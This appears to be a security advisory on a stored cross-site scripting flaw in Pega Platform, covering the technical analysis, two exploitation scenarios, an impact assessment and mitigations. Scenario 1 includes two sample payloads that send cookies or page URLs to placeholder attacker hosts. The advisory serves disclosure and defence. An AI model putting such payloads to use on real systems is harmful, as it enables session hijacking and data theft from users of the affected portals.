Executive Summary

CVE-2026-14337 is a stored cross-site scripting (XSS) vulnerability affecting Pega Platform versions 23.1.0 through 25.1.3. The flaw resides in an unspecified user interface component and requires a highly privileged user with developer-level access to exploit. Successful exploitation allows an attacker to inject arbitrary JavaScript that executes in the context of other authenticated users' browsers, potentially leading to session hijacking, privilege escalation, or lateral movement within the Pega environment. At the time of this writing, no vendor patch has been released, and exploitation activity has not been publicly confirmed; however, the attack surface is significant given Pega's widespread enterprise adoption in CRM, case management, and workflow automation.

Technical Analysis

The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically the stored XSS variant. Pega Platform's UI component framework processes user-supplied data through its proprietary rules engine, which governs how fields, sections, and other UI elements are rendered and serialized. The flaw arises from insufficient encoding or sanitization of attacker-controlled input when it is persisted into the system's data store and subsequently rendered back to other users without proper context-aware output encoding.

The affected component is likely one of Pega's declarative UI elements or a custom property/field configured through App Studio or Dev Studio. A developer-level user — one with access to create or modify UI rules, sections, or harnesses — can inject a malicious payload (e.g., <script>, javascript: URIs, or event handler attributes) into a field that is rendered without HTML encoding. Because Pega's UI rendering engine processes rules at runtime, the payload can be stored in the PegaRULES database and executed when any user loads the affected view.

The attack surface includes:

  • Pega Infinity / Pega Platform web portals exposed to authenticated users (employee portals, customer service portals).
  • UI rules and harnesses modified via Dev Studio or App Studio.
  • Dynamic layout containers that render data from database tables or clipboard pages.
  • Report definitions that output data into HTML grids without proper escaping.

The vulnerability does not require network-level access beyond standard HTTPS connectivity to the Pega application server. The requirement for a high-privileged developer role reduces the likelihood of direct external exploitation, but it significantly amplifies the impact of a compromised developer account or insider threat.

Exploitation Scenarios

Scenario 1: Insider / Compromised Developer Account

  1. Reconnaissance: An attacker identifies a target Pega Platform instance (e.g., https://pega.corp.example.com/prweb) via Shodan or manual enumeration. The attacker authenticates using a compromised developer account (obtained via phishing, credential stuffing, or lateral movement).

  2. Trigger / Weaponization: Using Dev Studio, the attacker navigates to a vulnerable UI section or harness. The attacker injects a payload into a field or property that is rendered unencoded. The payload is crafted to be evasive:

    <img src=x onerror="fetch('https://evil.example/c2?c='+encodeURIComponent(document.cookie))">

Alternatively, the attacker uses a payload that executes on page load for a specific portal:

    <script>new Image().src='https://attacker.example/steal?u='+encodeURIComponent(location.href)</script>

  3. Payload / Execution: The attacker saves the rule. Any user who subsequently accesses the affected portal or view triggers the payload. The script executes in their browser session with the victim's privileges.

  4. Post-Exploitation: The attacker harvests session cookies, CSRF tokens, or clipboard data. With a harvested admin session, the attacker can disable security policies, create backdoor accounts, exfiltrate case data, or pivot to connected systems.

Scenario 2: Multi-Tenant SaaS (Pega Cloud)

  1. Reconnaissance: An attacker targets a Pega Cloud customer portal (common subdomain pattern: *.pega.digital or *.pegaappcloud.com). The attacker obtains credentials for a customer's developer role via social engineering or prior breach data.

  2. Weaponization: The attacker modifies a shared UI framework rule used across multiple tenants (if tenant isolation is misconfigured). The stored payload propagates to all tenants sharing the rule.

  3. Execution & Impact: The payload executes in the context of the portal's domain, granting the attacker access to any data the portal renders — including PII, financial records, or healthcare data. The attacker uses the captured session to perform unauthorized actions or exfiltrate large data volumes.

Impact Assessment

The business impact of CVE-2026-14337 is High for organizations running Pega Platform in production, particularly those with strict compliance requirements (GDPR, HIPAA, PCI DSS).

  • Confidentiality: Stored XSS enables exfiltration of sensitive data rendered in the browser, including PII, financial information, case notes, and customer records. An attacker can also steal session cookies, leading to account takeover.
  • Integrity: The attacker can modify data within the context of the victim's session, altering case statuses, approval workflows, or customer-facing content.
  • Availability: Although less likely, the injected payload could crash the browser or navigate users to malicious pages, degrading productivity.

Blast Radius: The primary attack surface is internal users, B2B portal customers, or customer service agents. A single injection point can affect all users of the affected portal. In a multi-tenant environment, the blast radius expands to all tenants sharing the vulnerable UI rule.

Exploitability: The composite CVSS score (assuming NVD's likely rating) reflects the high privilege requirement (PR:H) and user interaction (UI:R). However, the scope change (S:C) and high confidentiality impact (C:H) make this a serious vulnerability when a developer account is compromised.

Known Campaigns: No active exploitation in the wild or threat actor campaigns have been publicly documented as of this report.

Mitigation & Patch Guidance

Patch Confidence: 0/4 (UNPATCHED — no patch evidence from any tracked source).

At the time of writing, Pega has not released a security patch for CVE-2026-14337. The following actions are recommended:

  1. Immediate Mitigations (until patch availability):

    • Restrict Developer Access: Temporarily reduce the number of users with developer roles. Audit all current developer accounts and remove inactive or unnecessary privileges.
    • Enable WAF Rules: Deploy a Web Application Firewall (WAF) rule to block or flag requests containing XSS payload signatures targeting Pega endpoints (/prweb/*).
    • Input Validation: Implement additional server-side validation and output encoding for all UI rule inputs if custom patches are feasible within your environment.
    • Audit Logs: Enable verbose logging for all rule modifications and monitor for suspicious changes.
  2. Patch / Upgrade Steps:

    • Track Vendor Advisories: Monitor Pega's security bulletins (https://community.pega.com) for an official fix. Subscribe to their CSRF (Critical Security Response Feed).
    • Apply Patch When Available: Once Pega releases a hotfix or version update (predicted to be 25.1.4 or a dedicated hotfix), test in a staging environment and deploy it across all production clusters.
    • Verify Version: Confirm your current version with pzVersion utility or via operator ID help menus.
  3. Long-Term Hardening:

    • Least Privilege: strictly enforce least privilege for developer access. Implement mandatory MFA and consider dynamic privilege elevation.
    • Security Code Review: Incorporate automated SAST scanning of all custom UI rules and sections in your CI/CD pipeline.
    • Harden Pega Config: Enable content security policies (CSP) in your application server configuration to restrict inline script execution. Set strict output encoding defaults for text fields.
    • Routine Penetration Testing: Include XSS testing against Pega UI components in your periodic external and internal penetration tests.
